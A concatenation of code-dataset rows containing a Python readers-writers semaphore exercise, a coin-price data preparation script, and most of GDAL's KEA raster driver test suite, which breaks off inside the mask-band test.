NUMBER_OF_WRITERS = 5
class Room:
def __init__(self):
self.light_switch = LightSwitch()
self.room_empty = Semaphore(1)
self.turnstile = Semaphore(1) # turnstile to prevent starvation
def read(room, thread_id):
while True:
sleep(randint(0, 1) / 10)
room.turnstile.wait()
room.turnstile.signal()
room.light_switch.lock(room.room_empty)
(print("Thread [{0}] started reading, {1} threads reading".format(
thread_id, room.light_switch.counter))
if room.light_switch.counter != 1
else print("Thread [{0}] started reading, {1} thread reading".format(
thread_id, room.light_switch.counter)))
sleep(randint(0, 10) / 100)
room.light_switch.unlock(room.room_empty)
(print("Thread [{0}] finished reading, {1} threads reading".format(
thread_id, room.light_switch.counter))
if room.light_switch.counter != 1
else print("Thread [{0}] finished reading, {1} thread reading".format(
thread_id, room.light_switch.counter)))
def write(room, thread_id):
while True:
sleep(randint(0, 1) / 10)
room.turnstile.wait()
room.room_empty.wait()
print("Thread [%d] started writing" % thread_id)
sleep(randint(0, 10) / 100)
room.room_empty.signal()
room.turnstile.signal()
print("Thread [%d] finished writing" % thread_id)
room = Room()
readers = list()
writers = list()
for i in range(NUMBER_OF_READERS):
readers.append(Thread(read, room, i))
for j in range(NUMBER_OF_WRITERS):
writers.append(Thread(write, room, j))
for r in readers:
r.join()
for w in writers:
w.join()
| [
"matuspohancenik@gmail.com"
] | matuspohancenik@gmail.com |
395a613eb3e609cee767e7968520bf8a85f08f74 | 68709668d94e914fd6e1ee2011a5291cf8d07fca | /mod_data.py | 3c2bf12bf0ac904712efd33b7b694f06d6b66dba | [] | no_license | dukererenst/Coin-Prediction | 387256c3f9be9634f73e27c6f0ca83529bf8799a | 28dce6ce03d2a1d23e4a93f2dfa4244c85417e1c | refs/heads/master | 2020-03-27T18:28:32.157717 | 2017-11-20T04:59:04 | 2017-11-20T04:59:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,194 | py | import numpy as np
from random import shuffle
filename = "/home/stan/Projects/TensorFlow/coin-prediction/data/condensed/data_just_24h.csv"
offset = 288
def sample_handling(sample):
featureset = []
input_data = []
output_data = []
global offset
with open(sample, 'r') as f:
contents = f.readlines()
hm_lines = len(contents)-offset
for l in contents[1:hm_lines]:
l = l.strip().split(',')
input_data.append(l)
for l in contents[offset+1:len(contents)]:
l = l.strip().split(',')
output_data.append(l)
for i in range(len(input_data)):
featureset.append([input_data[i], output_data[i]])
print(len(featureset))
return featureset
def create_feature_sets_and_labels(test_size = .1):
global filename
featureset = []
featureset += sample_handling(filename)
shuffle(featureset)
testing_size = int(test_size * len(featureset))
print(testing_size)
train_x = [item[0] for item in featureset[:-testing_size]]
train_y = [item[1] for item in featureset[:-testing_size]]
test_x = [item[0] for item in featureset[-testing_size:]]
test_y = [item[1] for item in featureset[-testing_size:]]
return train_x,train_y,test_x,test_y
#create_feature_sets_and_labels() | [
"clinestanford@gmail.com"
] | clinestanford@gmail.com |
6808a79a41526dcd13328e520ccf4ed137afc868 | 0feec97d29377f419d0e4e160b589f094d7493df | /autotest/gdrivers/kea.py | ec95f2f2520c9bd57a506dc29a6cf83f7039f2af | [
"MIT"
] | permissive | Komzpa/gdal | 305176b1146cb4a9783cc17eb1308a8d2ac4a093 | 9ab85be2cc927a34d6fdf311e803aeaf7362fba3 | refs/heads/trunk | 2020-12-28T19:11:33.810933 | 2015-04-04T23:38:45 | 2015-04-04T23:38:45 | 33,422,287 | 0 | 1 | null | 2015-04-04T22:18:40 | 2015-04-04T22:18:40 | null | UTF-8 | Python | false | false | 30,081 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# $Id $
#
# Project: GDAL/OGR Test Suite
# Purpose: Test KEA driver
# Author: Even Rouault, <even dot rouault at spatialys dot com>
#
###############################################################################
# Copyright (c) 2014, Even Rouault <even dot rouault at spatialys dot com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import sys
from osgeo import gdal
sys.path.append( '../pymod' )
import gdaltest
###############################################################################
def kea_init():
try:
gdaltest.kea_driver = gdal.GetDriverByName('KEA')
except:
gdaltest.kea_driver = None
return 'success'
###############################################################################
# Test copying a reference sample with CreateCopy()
def kea_1():
if gdaltest.kea_driver is None:
return 'skip'
tst = gdaltest.GDALTest( 'KEA', 'byte.tif', 1, 4672, options = ['IMAGEBLOCKSIZE=15', 'THEMATIC=YES'] )
return tst.testCreateCopy( check_srs = True, check_gt = 1 )
###############################################################################
# Test CreateCopy() for various data types
def kea_2():
if gdaltest.kea_driver is None:
return 'skip'
src_files = [ 'byte.tif',
'int16.tif',
'../../gcore/data/uint16.tif',
'../../gcore/data/int32.tif',
'../../gcore/data/uint32.tif',
'../../gcore/data/float32.tif',
'../../gcore/data/float64.tif' ]
for src_file in src_files:
tst = gdaltest.GDALTest( 'KEA', src_file, 1, 4672 )
ret = tst.testCreateCopy( check_minmax = 1 )
if ret != 'success':
return ret
return 'success'
###############################################################################
# Test Create() for various data types
def kea_3():
if gdaltest.kea_driver is None:
return 'skip'
src_files = [ 'byte.tif',
'int16.tif',
'../../gcore/data/uint16.tif',
'../../gcore/data/int32.tif',
'../../gcore/data/uint32.tif',
'../../gcore/data/float32.tif',
'../../gcore/data/float64.tif' ]
for src_file in src_files:
tst = gdaltest.GDALTest( 'KEA', src_file, 1, 4672 )
ret = tst.testCreate( out_bands = 1, check_minmax = 1 )
if ret != 'success':
return ret
return 'success'
###############################################################################
# Test Create()/CreateCopy() error cases or limit cases
def kea_4():
if gdaltest.kea_driver is None:
return 'skip'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ds = gdaltest.kea_driver.Create("/non_existing_path", 1, 1)
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
src_ds = gdaltest.kea_driver.Create('tmp/src.kea', 1, 1, 0)
if src_ds is None:
gdaltest.post_reason('fail')
return 'fail'
ds = gdaltest.kea_driver.CreateCopy("tmp/out.kea", src_ds)
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterCount != 0:
gdaltest.post_reason('fail')
return 'fail'
src_ds = None
ds = None
# Test updating a read-only file
ds = gdaltest.kea_driver.Create('tmp/out.kea', 1, 1)
ds.GetRasterBand(1).Fill(255)
ds = None
ds = gdal.Open('tmp/out.kea')
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.SetProjection('a')
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.SetGeoTransform([1,2,3,4,5,6])
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
# Disabled for now since some of them cause memory leaks or
# crash in the HDF5 library finalizer
if False:
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.SetMetadataItem('foo', 'bar')
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.SetMetadata({'foo': 'bar'})
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.GetRasterBand(1).SetMetadataItem('foo', 'bar')
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.GetRasterBand(1).SetMetadata({'foo': 'bar'})
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.SetGCPs([], "")
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ret = ds.AddBand(gdal.GDT_Byte)
gdal.PopErrorHandler()
if ret == 0:
gdaltest.post_reason('fail')
return 'fail'
ds.GetRasterBand(1).WriteRaster(0,0,1,1,'\0')
gdal.ErrorReset()
gdal.PushErrorHandler('CPLQuietErrorHandler')
ds.FlushCache()
gdal.PopErrorHandler()
if ds.GetRasterBand(1).Checksum() != 3:
gdaltest.post_reason('fail')
return 'fail'
ds = None
gdaltest.kea_driver.Delete('tmp/src.kea')
gdaltest.kea_driver.Delete('tmp/out.kea')
return 'success'
###############################################################################
# Test Create() creation options
def kea_5():
if gdaltest.kea_driver is None:
return 'skip'
options = [ 'IMAGEBLOCKSIZE=15', 'ATTBLOCKSIZE=100', 'MDC_NELMTS=10',
'RDCC_NELMTS=256', 'RDCC_NBYTES=500000', 'RDCC_W0=0.5',
'SIEVE_BUF=32768', 'META_BLOCKSIZE=1024', 'DEFLATE=9', 'THEMATIC=YES' ]
ds = gdaltest.kea_driver.Create("tmp/out.kea", 100, 100, 3, options = options)
ds = None
ds = gdal.Open('tmp/out.kea')
if ds.GetRasterBand(1).GetBlockSize() != [15,15]:
gdaltest.post_reason('fail')
print(ds.GetRasterBand(1).GetBlockSize())
return 'failure'
if ds.GetRasterBand(1).GetMetadataItem('LAYER_TYPE') != 'thematic':
gdaltest.post_reason('fail')
print(ds.GetRasterBand(1).GetMetadata())
return 'failure'
if ds.GetRasterBand(1).Checksum() != 0:
gdaltest.post_reason('fail')
print(ds.GetRasterBand(1).Checksum())
return 'failure'
if ds.GetGeoTransform() != (0,1,0,0,0,-1):
gdaltest.post_reason('fail')
print(ds.GetGeoTransform())
return 'failure'
if ds.GetProjectionRef() != '':
gdaltest.post_reason('fail')
print(ds.GetProjectionRef())
return 'failure'
ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
return 'success'
###############################################################################
# Test metadata
def kea_6():
if gdaltest.kea_driver is None:
return 'skip'
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1, 5)
ds.SetMetadata( { 'foo':'bar' } )
ds.SetMetadataItem( 'bar', 'baw' )
ds.GetRasterBand(1).SetMetadata( { 'bar':'baz' } )
ds.GetRasterBand(1).SetDescription('desc')
ds.GetRasterBand(2).SetMetadata( { 'LAYER_TYPE' : 'any_string_that_is_not_athematic_is_thematic' } )
ds.GetRasterBand(3).SetMetadata( { 'LAYER_TYPE' : 'athematic' } )
ds.GetRasterBand(4).SetMetadataItem( 'LAYER_TYPE', 'thematic' )
ds.GetRasterBand(5).SetMetadataItem( 'LAYER_TYPE', 'athematic' )
if ds.SetMetadata( { 'foo':'bar' }, 'other_domain' ) == 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.SetMetadataItem( 'foo', 'bar', 'other_domain' ) == 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).SetMetadata( { 'foo':'bar' }, 'other_domain' ) == 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).SetMetadataItem( 'foo', 'bar', 'other_domain' ) == 0:
gdaltest.post_reason('fail')
return 'fail'
ds = None
ds = gdal.Open('tmp/out.kea')
if ds.GetMetadata('other_domain') != {}:
gdaltest.post_reason('fail')
print(ds.GetMetadata('other_domain'))
return 'fail'
if ds.GetMetadataItem('item', 'other_domain') is not None:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).GetMetadata('other_domain') != {}:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).GetMetadataItem('item', 'other_domain') is not None:
gdaltest.post_reason('fail')
return 'fail'
md = ds.GetMetadata()
if md['foo'] != 'bar':
gdaltest.post_reason('fail')
print(md)
return 'failure'
if ds.GetMetadataItem('foo') != 'bar':
gdaltest.post_reason('fail')
print(ds.GetMetadataItem('foo'))
return 'failure'
if ds.GetMetadataItem('bar') != 'baw':
gdaltest.post_reason('fail')
print(ds.GetMetadataItem('bar'))
return 'failure'
if ds.GetRasterBand(1).GetDescription() != 'desc':
gdaltest.post_reason('fail')
return 'failure'
md = ds.GetRasterBand(1).GetMetadata()
if md['bar'] != 'baz':
gdaltest.post_reason('fail')
print(md)
return 'failure'
if ds.GetRasterBand(1).GetMetadataItem('bar') != 'baz':
gdaltest.post_reason('fail')
print(ds.GetRasterBand(1).GetMetadataItem('bar'))
return 'failure'
if ds.GetRasterBand(2).GetMetadataItem('LAYER_TYPE') != 'thematic':
gdaltest.post_reason('fail')
print(ds.GetRasterBand(2).GetMetadataItem('LAYER_TYPE'))
return 'failure'
if ds.GetRasterBand(3).GetMetadataItem('LAYER_TYPE') != 'athematic':
gdaltest.post_reason('fail')
print(ds.GetRasterBand(3).GetMetadataItem('LAYER_TYPE'))
return 'failure'
if ds.GetRasterBand(4).GetMetadataItem('LAYER_TYPE') != 'thematic':
gdaltest.post_reason('fail')
print(ds.GetRasterBand(4).GetMetadataItem('LAYER_TYPE'))
return 'failure'
if ds.GetRasterBand(5).GetMetadataItem('LAYER_TYPE') != 'athematic':
gdaltest.post_reason('fail')
print(ds.GetRasterBand(5).GetMetadataItem('LAYER_TYPE'))
return 'failure'
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds)
ds = None
if out2_ds.GetMetadataItem('foo') != 'bar':
gdaltest.post_reason('fail')
print(out2_ds.GetMetadataItem('foo'))
return 'failure'
if out2_ds.GetRasterBand(1).GetMetadataItem('bar') != 'baz':
gdaltest.post_reason('fail')
print(out2_ds.GetRasterBand(1).GetMetadataItem('bar'))
return 'failure'
out2_ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
###############################################################################
# Test georef
def kea_7():
if gdaltest.kea_driver is None:
return 'skip'
# Geotransform
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1)
if ds.GetGCPCount() != 0:
gdaltest.post_reason('fail')
return 'failure'
if ds.SetGeoTransform([1,2,3,4,5,6]) != 0:
gdaltest.post_reason('fail')
return 'failure'
if ds.SetProjection('foo') != 0:
gdaltest.post_reason('fail')
return 'failure'
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds)
ds = None
if out2_ds.GetGCPCount() != 0:
gdaltest.post_reason('fail')
return 'failure'
if out2_ds.GetGeoTransform() != (1,2,3,4,5,6):
gdaltest.post_reason('fail')
print(out2_ds.GetGeoTransform())
return 'failure'
if out2_ds.GetProjectionRef() != 'foo':
gdaltest.post_reason('fail')
print(out2_ds.GetProjectionRef())
return 'failure'
out2_ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
# GCP
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1)
gcp1 = gdal.GCP(0,1,2,3,4)
gcp1.Id = "id"
gcp1.Info = "info"
gcp2 = gdal.GCP(0,1,2,3,4)
gcps = [ gcp1, gcp2 ]
ds.SetGCPs(gcps, "foo")
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds)
ds = None
if out2_ds.GetGCPCount() != 2:
gdaltest.post_reason('fail')
return 'failure'
if out2_ds.GetGCPProjection() != 'foo':
gdaltest.post_reason('fail')
return 'failure'
got_gcps = out2_ds.GetGCPs()
for i in range(2):
if got_gcps[i].GCPX != gcps[i].GCPX or got_gcps[i].GCPY != gcps[i].GCPY or \
got_gcps[i].GCPZ != gcps[i].GCPZ or got_gcps[i].GCPPixel != gcps[i].GCPPixel or \
got_gcps[i].GCPLine != gcps[i].GCPLine or got_gcps[i].Id != gcps[i].Id or \
got_gcps[i].Info != gcps[i].Info:
print(i)
print(got_gcps[i])
gdaltest.post_reason('fail')
return 'failure'
out2_ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
###############################################################################
# Test colortable
def kea_8():
if gdaltest.kea_driver is None:
return 'skip'
for i in range(2):
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1)
if ds.GetRasterBand(1).GetColorTable() is not None:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).SetColorTable( None ) == 0: # not allowed by the driver
gdaltest.post_reason('fail')
return 'fail'
ct = gdal.ColorTable()
ct.SetColorEntry( 0, (0,255,0,255) )
ct.SetColorEntry( 1, (255,0,255,255) )
ct.SetColorEntry( 2, (0,0,255,255) )
if ds.GetRasterBand(1).SetColorTable( ct ) != 0:
gdaltest.post_reason('fail')
return 'fail'
if i == 1:
# And again
if ds.GetRasterBand(1).SetColorTable( ct ) != 0:
gdaltest.post_reason('fail')
return 'fail'
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds)
ds = None
got_ct = out2_ds.GetRasterBand(1).GetColorTable()
if got_ct.GetCount() != 3:
gdaltest.post_reason( 'Got wrong color table entry count.' )
return 'fail'
if got_ct.GetColorEntry(1) != (255,0,255,255):
gdaltest.post_reason( 'Got wrong color table entry.' )
return 'fail'
out2_ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
###############################################################################
# Test color interpretation
def kea_9():
if gdaltest.kea_driver is None:
return 'skip'
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1, gdal.GCI_YCbCr_CrBand - gdal.GCI_GrayIndex + 1)
if ds.GetRasterBand(1).GetColorInterpretation() != gdal.GCI_GrayIndex:
gdaltest.post_reason('fail')
return 'fail'
for i in range(gdal.GCI_GrayIndex, gdal.GCI_YCbCr_CrBand + 1):
ds.GetRasterBand(i).SetColorInterpretation(i)
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds)
ds = None
for i in range(gdal.GCI_GrayIndex, gdal.GCI_YCbCr_CrBand + 1):
if out2_ds.GetRasterBand(i).GetColorInterpretation() != i:
gdaltest.post_reason( 'Got wrong color interpreation.' )
print(i)
print(out2_ds.GetRasterBand(i).GetColorInterpretation())
return 'fail'
out2_ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
###############################################################################
# Test nodata
def kea_10():
if gdaltest.kea_driver is None:
return 'skip'
for (dt,nd,expected_nd) in [ (gdal.GDT_Byte,0,0),
(gdal.GDT_Byte,1.1,1.0),
(gdal.GDT_Byte,255,255),
(gdal.GDT_Byte,-1,None),
(gdal.GDT_Byte,256,None),
(gdal.GDT_UInt16,0,0),
(gdal.GDT_UInt16,65535,65535),
(gdal.GDT_UInt16,-1,None),
(gdal.GDT_UInt16,65536,None),
(gdal.GDT_Int16,-32768,-32768),
(gdal.GDT_Int16,32767,32767),
(gdal.GDT_Int16,-32769,None),
(gdal.GDT_Int16,32768,None),
(gdal.GDT_UInt32,0,0),
(gdal.GDT_UInt32,0xFFFFFFFF,0xFFFFFFFF),
(gdal.GDT_UInt32,-1,None),
(gdal.GDT_UInt32,0xFFFFFFFF+1,None),
(gdal.GDT_Int32,-2147483648,-2147483648),
(gdal.GDT_Int32,2147483647,2147483647),
(gdal.GDT_Int32,-2147483649,None),
(gdal.GDT_Int32,2147483648,None),
(gdal.GDT_Float32,0.5,0.5),
]:
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1, 1, dt)
if ds.GetRasterBand(1).GetNoDataValue() is not None:
gdaltest.post_reason('fail')
return 'fail'
ds.GetRasterBand(1).SetNoDataValue(nd)
if ds.GetRasterBand(1).GetNoDataValue() != expected_nd:
gdaltest.post_reason( 'Got wrong nodata.' )
print(dt)
print(ds.GetRasterBand(1).GetNoDataValue())
return 'fail'
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds)
ds = None
if out2_ds.GetRasterBand(1).GetNoDataValue() != expected_nd:
gdaltest.post_reason( 'Got wrong nodata.' )
print(dt)
print(out2_ds.GetRasterBand(1).GetNoDataValue())
return 'fail'
out2_ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
###############################################################################
# Test AddBand
def kea_11():
if gdaltest.kea_driver is None:
return 'skip'
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1, 1, gdal.GDT_Byte)
ds = None
ds = gdal.Open('tmp/out.kea', gdal.GA_Update)
if ds.AddBand(gdal.GDT_Byte) != 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.AddBand(gdal.GDT_Int16, options = ['DEFLATE=9']) != 0:
gdaltest.post_reason('fail')
return 'fail'
ds = None
ds = gdal.Open('tmp/out.kea')
if ds.RasterCount != 3:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(2).DataType != gdal.GDT_Byte:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(3).DataType != gdal.GDT_Int16:
gdaltest.post_reason('fail')
return 'fail'
ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
return 'success'
###############################################################################
# Test RAT
def kea_12():
if gdaltest.kea_driver is None:
return 'skip'
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1, 1, gdal.GDT_Byte)
if ds.GetRasterBand(1).GetDefaultRAT().GetColumnCount() != 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).SetDefaultRAT( None ) == 0: # not allowed by the driver
gdaltest.post_reason('fail')
return 'fail'
rat = ds.GetRasterBand(1).GetDefaultRAT()
rat.CreateColumn('col_real_generic', gdal.GFT_Real, gdal.GFU_Generic)
if ds.GetRasterBand(1).SetDefaultRAT( rat ) != 0:
gdaltest.post_reason('fail')
return 'fail'
rat = ds.GetRasterBand(1).GetDefaultRAT()
rat.CreateColumn('col_integer_pixelcount', gdal.GFT_Real, gdal.GFU_PixelCount)
rat.CreateColumn('col_string_name', gdal.GFT_String, gdal.GFU_Name)
rat.CreateColumn('col_integer_red', gdal.GFT_Integer, gdal.GFU_Red)
rat.CreateColumn('col_integer_green', gdal.GFT_Integer, gdal.GFU_Green)
rat.CreateColumn('col_integer_blue', gdal.GFT_Integer, gdal.GFU_Blue)
rat.CreateColumn('col_integer_alpha', gdal.GFT_Integer, gdal.GFU_Alpha)
rat.SetRowCount(1)
rat.SetValueAsString(0,0,"1.23")
rat.SetValueAsInt(0,0,1)
rat.SetValueAsDouble(0,0,1.23)
rat.SetValueAsInt(0,2,0)
rat.SetValueAsDouble(0,2,0)
rat.SetValueAsString(0,2,'foo')
rat.SetValueAsString(0,3,"123")
rat.SetValueAsDouble(0,3,123)
rat.SetValueAsInt(0,3,123)
cloned_rat = rat.Clone()
if ds.GetRasterBand(1).SetDefaultRAT( rat ) != 0:
gdaltest.post_reason('fail')
return 'fail'
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds)
rat = out2_ds.GetRasterBand(1).GetDefaultRAT()
for i in range(7):
if rat.GetColOfUsage(rat.GetUsageOfCol(i)) != i:
gdaltest.post_reason('fail')
print(i)
print(rat.GetColOfUsage(rat.GetUsageOfCol(i)))
return 'fail'
if cloned_rat.GetNameOfCol(0) != 'col_real_generic':
gdaltest.post_reason('fail')
return 'fail'
if cloned_rat.GetTypeOfCol(0) != gdal.GFT_Real:
gdaltest.post_reason('fail')
return 'fail'
if cloned_rat.GetUsageOfCol(0) != gdal.GFU_Generic:
gdaltest.post_reason('fail')
return 'fail'
if cloned_rat.GetUsageOfCol(1) != gdal.GFU_PixelCount:
gdaltest.post_reason('fail')
return 'fail'
if cloned_rat.GetTypeOfCol(2) != gdal.GFT_String:
gdaltest.post_reason('fail')
return 'fail'
if cloned_rat.GetTypeOfCol(3) != gdal.GFT_Integer:
gdaltest.post_reason('fail')
return 'fail'
if rat.GetColumnCount() != cloned_rat.GetColumnCount():
gdaltest.post_reason('fail')
return 'fail'
if rat.GetRowCount() != cloned_rat.GetRowCount():
gdaltest.post_reason('fail')
return 'fail'
for i in range(rat.GetColumnCount()):
if rat.GetNameOfCol(i) != cloned_rat.GetNameOfCol(i):
gdaltest.post_reason('fail')
return 'fail'
if rat.GetTypeOfCol(i) != cloned_rat.GetTypeOfCol(i):
gdaltest.post_reason('fail')
return 'fail'
if rat.GetUsageOfCol(i) != cloned_rat.GetUsageOfCol(i):
gdaltest.post_reason('fail')
print(i)
print(rat.GetUsageOfCol(i))
print(cloned_rat.GetUsageOfCol(i))
return 'fail'
gdal.PushErrorHandler('CPLQuietErrorHandler')
rat.GetNameOfCol(-1)
rat.GetTypeOfCol(-1)
rat.GetUsageOfCol(-1)
rat.GetNameOfCol(rat.GetColumnCount())
rat.GetTypeOfCol(rat.GetColumnCount())
rat.GetUsageOfCol(rat.GetColumnCount())
rat.GetValueAsDouble( -1, 0 )
rat.GetValueAsInt( -1, 0 )
rat.GetValueAsString( -1, 0 )
rat.GetValueAsDouble( rat.GetColumnCount(), 0 )
rat.GetValueAsInt( rat.GetColumnCount(), 0 )
rat.GetValueAsString( rat.GetColumnCount(), 0 )
rat.GetValueAsDouble( 0, -1 )
rat.GetValueAsInt( 0, -1 )
rat.GetValueAsString( 0, -1 )
rat.GetValueAsDouble( 0, rat.GetRowCount() )
rat.GetValueAsInt( 0, rat.GetRowCount() )
rat.GetValueAsString( 0, rat.GetRowCount() )
gdal.PopErrorHandler()
if rat.GetValueAsDouble( 0, 0 ) != 1.23:
gdaltest.post_reason('fail')
return 'fail'
if rat.GetValueAsInt( 0, 0 ) != 1:
gdaltest.post_reason('fail')
return 'fail'
if rat.GetValueAsString( 0, 0 ) != '1.23':
gdaltest.post_reason('fail')
print(rat.GetValueAsString( 0, 0 ))
return 'fail'
if rat.GetValueAsInt( 0, 3 ) != 123:
gdaltest.post_reason('fail')
return 'fail'
if rat.GetValueAsDouble( 0, 3 ) != 123:
gdaltest.post_reason('fail')
return 'fail'
if rat.GetValueAsString( 0, 3 ) != '123':
gdaltest.post_reason('fail')
return 'fail'
if rat.GetValueAsString( 0, 2 ) != 'foo':
gdaltest.post_reason('fail')
return 'fail'
if rat.GetValueAsInt( 0, 2 ) != 0:
gdaltest.post_reason('fail')
return 'fail'
if rat.GetValueAsDouble( 0, 2 ) != 0:
gdaltest.post_reason('fail')
return 'fail'
ds = None
out2_ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
###############################################################################
# Test overviews
def kea_13():
if gdaltest.kea_driver is None:
return 'skip'
src_ds = gdal.Open('data/byte.tif')
ds = gdaltest.kea_driver.CreateCopy("tmp/out.kea", src_ds)
src_ds = None
ds.BuildOverviews('NEAR', [2])
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds) # yes CreateCopy() of KEA copies overviews
if out2_ds.GetRasterBand(1).GetOverviewCount() != 1:
gdaltest.post_reason('fail')
return 'fail'
if out2_ds.GetRasterBand(1).GetOverview(0).Checksum() != 1087:
gdaltest.post_reason('fail')
return 'fail'
if out2_ds.GetRasterBand(1).GetOverview(0).GetDefaultRAT() is not None:
gdaltest.post_reason('fail')
return 'fail'
if out2_ds.GetRasterBand(1).GetOverview(0).SetDefaultRAT(None) == 0:
gdaltest.post_reason('fail')
return 'fail'
if out2_ds.GetRasterBand(1).GetOverview(-1) is not None:
gdaltest.post_reason('fail')
return 'fail'
if out2_ds.GetRasterBand(1).GetOverview(1) is not None:
gdaltest.post_reason('fail')
return 'fail'
out2_ds = None
ds = None
gdaltest.kea_driver.Delete('tmp/out.kea')
gdaltest.kea_driver.Delete('tmp/out2.kea')
return 'success'
###############################################################################
# Test mask bands
def kea_14():
if gdaltest.kea_driver is None:
return 'skip'
ds = gdaltest.kea_driver.Create("tmp/out.kea", 1, 1, 1, gdal.GDT_Byte)
if ds.GetRasterBand(1).GetMaskFlags() != gdal.GMF_ALL_VALID:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).GetMaskBand().Checksum() != 3:
print(ds.GetRasterBand(1).GetMaskBand().Checksum())
gdaltest.post_reason('fail')
return 'fail'
ds.GetRasterBand(1).CreateMaskBand(0)
if ds.GetRasterBand(1).GetMaskFlags() != 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).GetMaskBand().Checksum() != 3:
print(ds.GetRasterBand(1).GetMaskBand().Checksum())
gdaltest.post_reason('fail')
return 'fail'
ds.GetRasterBand(1).GetMaskBand().Fill(0)
if ds.GetRasterBand(1).GetMaskBand().Checksum() != 0:
print(ds.GetRasterBand(1).GetMaskBand().Checksum())
gdaltest.post_reason('fail')
return 'fail'
ds = None
ds = gdal.Open('tmp/out.kea')
out2_ds = gdaltest.kea_driver.CreateCopy('tmp/out2.kea', ds) # yes CreateCopy() of KEA copies overviews
if out2_ds.GetRasterBand(1).GetMaskFlags() != 0:
gdaltest.post_reason('fail')
return 'fail'
